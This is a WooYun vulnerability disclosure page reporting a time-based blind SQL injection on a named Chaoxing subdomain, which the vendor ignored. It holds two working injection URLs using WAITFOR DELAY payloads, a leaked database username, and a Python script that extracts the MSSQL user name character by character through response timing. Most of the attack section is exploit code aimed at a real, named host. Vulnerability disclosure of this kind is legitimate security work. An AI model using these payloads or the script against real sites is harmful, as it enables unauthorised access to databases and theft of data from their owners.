当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
wooyun-2015-0158579
漏洞标题:
超星某分站SQL注入漏洞(附脚本验证)
相关厂商:
超星网
漏洞作者:
路人甲
提交时间:
2015-12-07 10:40
修复时间:
2015-12-12 10:42
公开时间:
2015-12-12 10:42
漏洞类型:
SQL注射漏洞
危害等级:
自评Rank:
20
漏洞状态:
漏洞已经通知厂商但是厂商忽略漏洞
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:
>

漏洞详情

披露状态:

2015-12-07: 细节已通知厂商并且等待厂商处理中
2015-12-12: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT

详细说明:

网站sy.chaoxing.com

poc 1
http://sy.chaoxing.com/nfavs/searchByKey.jspx?linkName=&cataid=01&cataName经典理论&dt=95 ;if  len(user)=8  WAITFOR DELAY '0:0:5' ;--
poc 2
http://sy.chaoxing.com/nfavs/searchByKey.jspx?linkName=&cataid=01&cataName经典理论&dt=95 ;if  user like '________'  WAITFOR DELAY '0:0:5' ;--
数据库用户
user='kyD_user'

漏洞证明:

也写个脚本

#encoding=utf-8
import httplib
import time
import string
import sys
import random
import hashlib
import  requests
payloads = list(string.ascii_lowercase)
for i in range(0,10):
    payloads.append(str(i))
payloads.extend(string.ascii_uppercase)
payloads += ['@', '.','_']
print '[%s] Start to retrive mssql User' % time.strftime('%H:%M:%S', time.localtime())
user = ''
length=8
result=""
for i in range(1,30):
    found=False
    while found==False:
        misscountperloop=0
        for payload in payloads:
            timeout_count = 0
            for j in range(1,3):   # 2 times to confirm
                try:
                    likeholder=""
                    if result:
                        likeholder+=result
                    likeholder+=payload
                    for j in range(7-len(result)):
                        likeholder+="_"
                    url="http://sy.chaoxing.com/nfavs/searchByKey.jspx?linkName=&cataid=01&cataName经典理论&dt=95 ;if  user like '"+likeholder+"'  WAITFOR DELAY '0:0:5' ;--"
                    requests.get(url,timeout=4)
                    print '.',
                    misscountperloop+=1
                    break
                except Exception, e:
                    #print e
                    timeout_count += 1
                    time.sleep(5)   # wait DB server recover from last query
                if timeout_count == 2:
                    result += payload
                    print '\n[In progress] now user is %s' % result
                    break
                if misscountperloop==len(payloads):
                    print result
                    sys.exit(1)
print '\nFinally, mssql user is', user

修复方案:

版权声明:转载请注明来源 路人甲@乌云

>

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-12-12 10:42

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无